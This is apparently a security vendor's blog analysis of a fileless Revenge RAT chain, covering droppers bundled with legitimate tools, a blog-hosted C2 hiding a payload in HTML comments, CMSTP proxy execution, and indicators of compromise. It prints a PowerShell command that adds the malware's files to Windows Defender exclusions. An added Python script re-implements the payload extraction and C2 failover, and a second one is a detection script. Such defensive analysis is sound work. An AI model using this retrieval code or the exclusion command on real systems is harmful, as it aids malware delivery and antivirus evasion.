Fileless Revenge RAT Malware

AhnLab SEcurity intelligence Center (ASEC) recently identified Revenge RAT malware being distributed as a build that wraps legitimate tools. The attackers appear to have used tools such as ‘smtp-validator’ and ‘Email To Sms’ as the carrier. On execution, the malware drops and runs both the legitimate tool and a malicious file, so the user sees the program they expected and has little reason to suspect that malicious activity has taken place.

As shown in the code below, the loader creates and runs Setup.exe (the malicious file) before executing smtp-verifier.exe (the legitimate tool). The dropped file is given the ‘Hidden’ attribute, so it does not appear in Windows Explorer under default settings.

Figure 1. The code that creates and runs both legitimate and malicious files simultaneously

The figure below shows the overall flow of the malicious activity that follows. Many files are generated along the way; the threat actor’s ultimate goal is to run the Revenge RAT payload.

Figure 2. The overall flow chart of the malware

The malicious file “setup.exe” dropped alongside the legitimate tool serves only to generate additional malware, as shown below.

[ Setup.exe ]
1. Creates and runs svchost.exe in the %appdata%\Microsoft\Windows\Templates path with the FileAttribute.Hidden property
2. Registers the generated svchost.exe in the registry as an autorun entry (Value Name: Microsoft Corporation Security)

Figure 3. Registering svchost.exe into the registry

svchost.exe performs the following actions:

[ svchost.exe ]
1. Connects to the C2 (hxxps://***********[.]blogspot.com) and downloads an HTML page
2. Reads a specific HTML comment from the page, decodes and decompresses it, and creates and runs explorer.exe in the %appdata%\Microsoft\Windows\Templates path

The C2 is disguised as an ordinary blog and carries the malicious file inside an HTML comment at a specific offset. The malware reads the value between the <!--1111 and 2222--> markers written in the HTML, Base64-decodes it, decompresses the result, and writes out the additional malware.

Figure 4. The code that searches for the malicious binary in the HTML file
Figure 5. The C2 disguised as a blog with malicious binary included in the annotation

If the C2 URL used in step 1 is unreachable, the malware contacts a fallback URL (hxxp://**********.***********[.]com/2023/explorer.txt). The response contains a new C2 URL, which is likewise disguised as an ordinary blog. The threat actor built in this mechanism so that the chain survives if the existing C2 URL is blocked, and so that the C2 can be rotated to a new address.
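The retrieval logic described above (payload hidden in an HTML comment, Base64-decoded and decompressed, with a fallback URL that hands out a new C2) as an added example. This is not ASEC’s code or the malware’s code; it is a stand-alone Python reconstruction of the general technique. It assumes the comment markers are the standard HTML delimiters <!--1111 and 2222-->, and, because the post only says “decompresses”, it tries gzip, zlib and raw DEFLATE in turn. The fetcher is injected so the example runs offline against constructed responses, and the blog page it decodes is built by the example itself.

```python
"""Extract a payload hidden in an HTML comment and model the C2 failover.

Added example; not ASEC's code or the malware's code. Assumptions: the
comment markers are the standard HTML delimiters "<!--1111" / "2222-->",
and the blob is gzip, zlib or raw DEFLATE (the post only says "decompresses").
"""
import base64
import gzip
import re
import zlib
from typing import Callable, Optional

START_MARKER = "<!--1111"
END_MARKER = "2222-->"

# Defanged addresses exactly as the post gives them; the URLs are masked there.
PRIMARY_C2 = "hxxps://***********[.]blogspot.com"
FALLBACK_URL = "hxxp://**********.***********[.]com/2023/explorer.txt"

# A fetcher returns the response body, or None when the URL is unreachable.
Fetcher = Callable[[str], Optional[str]]


def decompress_any(blob: bytes) -> bytes:
    """Try the common DEFLATE containers; the post does not name the one used."""
    if blob[:2] == b"\x1f\x8b":                  # gzip magic
        return gzip.decompress(blob)
    try:
        return zlib.decompress(blob)              # zlib-wrapped DEFLATE
    except zlib.error:
        return zlib.decompress(blob, -zlib.MAX_WBITS)  # raw DEFLATE


def extract_payload(html: str) -> Optional[bytes]:
    """Return the decoded payload carried between the markers, or None."""
    start = html.find(START_MARKER)
    if start < 0:
        return None
    end = html.find(END_MARKER, start + len(START_MARKER))
    if end < 0:
        return None
    body = html[start + len(START_MARKER):end]
    # A blog editor may wrap the comment body across lines; strip whitespace.
    b64 = re.sub(r"\s+", "", body)
    try:
        raw = base64.b64decode(b64, validate=True)
    except ValueError:                            # binascii.Error is a ValueError
        return None
    return decompress_any(raw)


def fetch_stage(fetch: Fetcher) -> Optional[bytes]:
    """Primary C2 first; if it is down, ask the fallback URL for a new C2."""
    html = fetch(PRIMARY_C2)
    if html is None:
        new_c2 = fetch(FALLBACK_URL)
        if not new_c2:
            return None
        html = fetch(new_c2.strip())              # explorer.txt holds the new URL
        if html is None:
            return None
    return extract_payload(html)


def build_blog_page(payload: bytes, codec: str = "gzip") -> str:
    """Constructed sample of a blog page carrying a payload (test input only)."""
    if codec == "gzip":
        blob = gzip.compress(payload)
    elif codec == "zlib":
        blob = zlib.compress(payload)
    elif codec == "raw":
        c = zlib.compressobj(wbits=-zlib.MAX_WBITS)
        blob = c.compress(payload) + c.flush()
    else:
        raise ValueError(codec)
    b64 = base64.b64encode(blob).decode()
    wrapped = "\n".join(b64[i:i + 64] for i in range(0, len(b64), 64))
    return ("<html><body><p>Just another blog post.</p>\n"
            f"{START_MARKER}\n{wrapped}\n{END_MARKER}\n</body></html>")


if __name__ == "__main__":
    sample = b"MZ\x90\x00 constructed stage-two sample"
    page = build_blog_page(sample)
    canned = {FALLBACK_URL: "hxxps://rotated[.]blogspot.com\n",
              "hxxps://rotated[.]blogspot.com": page}   # primary is "down"
    print(fetch_stage(lambda url: canned.get(url)) == sample)
```

For hunting, the useful part is extract_payload: run it over saved copies of suspicious blog pages and inspect anything that decodes to an executable header. The fallback path is worth modelling because blocking only the blogspot host does not break the chain; the explorer.txt URL must be blocked as well.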

Figure 6. New C2 URL

The malicious file (explorer.exe) extracted from the C2’s HTML page performs the following actions:

[ explorer.exe ]
1. Creates version.exe in the %appdata%\Microsoft\Windows\ path
2. Creates an .inf file containing the path to version.exe in the %temp% path and runs it by passing it as an argument to cmstp.exe (CMSTP defense evasion)
3. Runs Revenge RAT filelessly in memory

The generated version.exe performs a single simple task:

[ version.exe ]
1. Uses a PowerShell command to add the files used in the attack to the Windows Defender exclusion list

explorer.exe then passes the .inf file to cmstp.exe, which in turn launches version.exe. This is the CMSTP evasion technique: the malicious file is executed through a built-in, signed Windows program (cmstp.exe) so that antivirus products are less likely to flag the launch. MITRE ATT&CK classifies it as System Binary Proxy Execution: CMSTP (T1218.003). The technique was covered in earlier ASEC Blog articles [1][2] (currently available in Korean only) and is commonly used by a variety of malware strains.

The .inf file passed to cmstp.exe is generated under a random filename (g1rfp0hb.inf at the time of analysis) in the %temp% path. It is stored as a template in the resource section of explorer.exe; when the file is generated, the placeholder string ‘REPLACE_COMMAND_LINE’ in the template is replaced with the path to version.exe.

Figure 7. The code that generates the .inf file
Figure 8. The .inf file with the version.exe’s path

version.exe, launched via the CMSTP evasion technique, executes the following command to add the malicious files used in the attack to the Windows Defender exclusion list. Note that most of the files used in the attack chain, such as explorer.exe and svchost.exe, are named after default Windows programs.

cmd.exe /c PowerShell.exe -windowstyle hidden Add-MpPreference -ExclusionPath
    %appdata%\Microsoft\Windows\explorer.exe
    %appdata%\Microsoft\Windows\Cortana.exe
    %appdata%\Microsoft\Windows\OneDrive.exe
    %appdata%\Microsoft\Windows\Templates\svchost.exe
    %appdata%\Microsoft\Windows\SystemSettings.exe
    %appdata%\Microsoft\Windows\Taskmgr.exe
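The chain from explorer.exe through cmstp.exe to the Defender exclusion command leaves a distinctive trail in process-creation telemetry. The following is an added detection example, not ASEC’s code or anything from the malware: it runs four checks over a small set of process events constructed to mirror the chain described above. The event fields (image, command_line, parent_image) are an assumed normalised schema rather than any specific product’s log format, and the sample paths and parent/child relationships are constructed for illustration.

```python
"""Flag the CMSTP proxy-execution / Defender-exclusion chain in process logs.

Added example; not ASEC's or the malware's code. The events are constructed
to mirror the chain in the post; the field names are an assumed schema.
"""
import re
from dataclasses import dataclass
from typing import List

# Binaries the chain names after default Windows programs. Their legitimate
# copies live under the Windows directory, never under a user profile.
SYSTEM_NAMES = {"svchost.exe", "explorer.exe", "taskmgr.exe", "onedrive.exe",
                "systemsettings.exe", "cortana.exe"}
USER_PROFILE = re.compile(r"\\(users|appdata)\\", re.IGNORECASE)
TEMP_INF = re.compile(r"\\temp\\[^\s\"]+\.inf\b", re.IGNORECASE)
EXCLUSION = re.compile(r"add-mppreference\s+-exclusionpath", re.IGNORECASE)


@dataclass
class ProcessEvent:
    image: str            # full path of the process that started
    command_line: str
    parent_image: str     # full path of the parent process


def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def analyse(events: List[ProcessEvent]) -> List[str]:
    """Return one finding string per suspicious observation."""
    findings = []
    for ev in events:
        name = basename(ev.image)
        parent = basename(ev.parent_image)

        # T1218.003: cmstp.exe handed an .inf file that lives in %temp%.
        if name == "cmstp.exe" and TEMP_INF.search(ev.command_line):
            findings.append(f"cmstp.exe loading INF from temp: {ev.command_line}")

        # cmstp.exe installing a connection profile has no reason to spawn
        # arbitrary programs; a child process is the proxied payload.
        if parent == "cmstp.exe":
            findings.append(f"cmstp.exe spawned child: {ev.image}")

        # Add-MpPreference -ExclusionPath from a script or shell.
        if name in {"powershell.exe", "cmd.exe"} and EXCLUSION.search(ev.command_line):
            findings.append(f"Defender exclusion being added: {ev.command_line}")

        # Masquerading: a Windows binary name running from a user profile.
        if name in SYSTEM_NAMES and USER_PROFILE.search(ev.image):
            findings.append(f"system binary name outside Windows dir: {ev.image}")
    return findings


# Constructed sample events mirroring the chain in the post (not real telemetry).
_APPDATA = r"C:\Users\victim\AppData\Roaming\Microsoft\Windows"
SAMPLE_EVENTS = [
    ProcessEvent(_APPDATA + r"\Templates\svchost.exe",
                 _APPDATA + r"\Templates\svchost.exe",
                 r"C:\Users\victim\Downloads\Setup.exe"),
    ProcessEvent(_APPDATA + r"\Templates\explorer.exe",
                 _APPDATA + r"\Templates\explorer.exe",
                 _APPDATA + r"\Templates\svchost.exe"),
    ProcessEvent(r"C:\Windows\System32\cmstp.exe",
                 r"cmstp.exe C:\Users\victim\AppData\Local\Temp\g1rfp0hb.inf",
                 _APPDATA + r"\Templates\explorer.exe"),
    ProcessEvent(_APPDATA + r"\version.exe",
                 _APPDATA + r"\version.exe",
                 r"C:\Windows\System32\cmstp.exe"),
    ProcessEvent(r"C:\Windows\System32\cmd.exe",
                 r"cmd.exe /c PowerShell.exe -windowstyle hidden Add-MpPreference "
                 r"-ExclusionPath " + _APPDATA + r"\explorer.exe",
                 _APPDATA + r"\version.exe"),
    # Benign control: the real svchost.exe started by the service control manager.
    ProcessEvent(r"C:\Windows\System32\svchost.exe",
                 r"C:\Windows\System32\svchost.exe -k netsvcs",
                 r"C:\Windows\System32\services.exe"),
]

if __name__ == "__main__":
    for line in analyse(SAMPLE_EVENTS):
        print(line)
```

On a live host the manual counterpart of the exclusion check is Get-MpPreference in PowerShell, whose ExclusionPath property lists every path currently excluded; entries under a user profile that name Windows system binaries deserve the same scrutiny as the command above.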

Finally, the malware reads a binary from its resource section and decrypts it with the DES algorithm to obtain the threat actor’s end goal, the Revenge RAT payload. MITRE ATT&CK tracks Revenge RAT as software entry S0379 and lists capabilities including collection of system information, screen capture, keylogging, downloading additional malware, and script execution.

Revenge RAT runs filelessly in memory. It collects data from the victim’s PC and sends it to the C2 (qcpanel.hackcrack[.]io:9561) Base64-encoded. The types of user data stolen are shown below:

[ Stolen Data ]
1. PC and user name
2. System information such as the OS, CPU, and drive capacity
3. Information about the parent process that launched Revenge RAT
4. IP address and region information
5. Names of anti-virus and firewall products in use

Figure 9. Revenge RAT malware’s C2
Figure 10. Collecting and sending data from the user’s PC

Users should take extra care when using open-source or freely distributed tools like the ones described in this article, and should download them only from the official website.

[File Detection]
– Trojan/Win.Generic.C4223332
– Trojan/Win.Generic.C5583117
– Dropper/Win.Generic.C5445718
– Dropper/Win.Generic.R634030
– Backdoor/Win.REVENGERAT.C5582863
– Backdoor/Win.REVENGERAT.R634026

[IOC Info]
MD5
42779ab18cf6367e7b91e621646237d1 (smtp-verifier.exe)
fb34fe9591ea3074f048feb5b515eb61 (Email To Sms V8.1.exe)
6d5ad2adce366350200958c37f08a994 (setup.exe)
914ec5019485543bb2ec8edcacd662a7 (setup.exe)
5e24e97bbc8354e13ee3ab70da2f3af6 (svchost.exe)
1242c41211464efab297bfa6c374223e (svchost.exe)
438817d3938ae5758d94bf2022a44505 (explorer.exe)
304e264473717fad8f7c6970212eaaa7 (version.exe)
d1af87e121d55230353cbad9b7024fae (Fileless RevengeRAT)
6e22b450a765caa999ca984521b42242 (g1rfp0hb.inf)

C&C
– qcpanel.hackcrack[.]io:9561


The post Fileless Revenge RAT Malware appeared first on ASEC BLOG.

Article Link: https://asec.ahnlab.com/en/61584/